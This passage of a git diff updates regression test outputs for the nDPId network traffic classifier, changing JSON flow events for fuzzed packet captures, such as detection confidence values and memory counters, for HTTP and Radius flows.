01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1031854565547,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854565547,"pkt":"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"} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -163,7 +163,7 @@ 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -174,10 +174,10 @@ 00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -206,9 +206,9 @@ ~~ total active/idle flows...: 39/39 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5926060 bytes -~~ total memory freed........: 5926060 bytes -~~ total allocations/frees...: 118413/118413 +~~ total memory allocated....: 6059694 bytes +~~ total memory freed........: 6059694 bytes +~~ total allocations/frees...: 121175/121175 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 201 chars ~~ json string max len.......: 2426 chars diff --git a/test/results/fuzz-2020-02-16-11740.pcap.out b/test/results/fuzz-2020-02-16-11740.pcap.out index ce496910a..08d272332 100644 --- a/test/results/fuzz-2020-02-16-11740.pcap.out +++ b/test/results/fuzz-2020-02-16-11740.pcap.out 
@@ -2,25 +2,25 @@ 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1528996067791} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1528996067791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996067791,"pkt":"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"} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1528996068005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528996068005,"pkt":"ABRP+4rqcNuYVcUnCABFAACl7dxAAPwRZijG4hk1CmZAHgcUchAAkTltCwoAiSM4ARafmcO5UlnZgWS\/VrEBNTAzMXE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAufWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6dmY6MTQvMjA1Tw4BAgAMFwwAAAwBQABQEpOK5mo0k\/FCxgtYc0d6dIg="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01324{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1528996068129,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528996068129,"pkt":"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"} 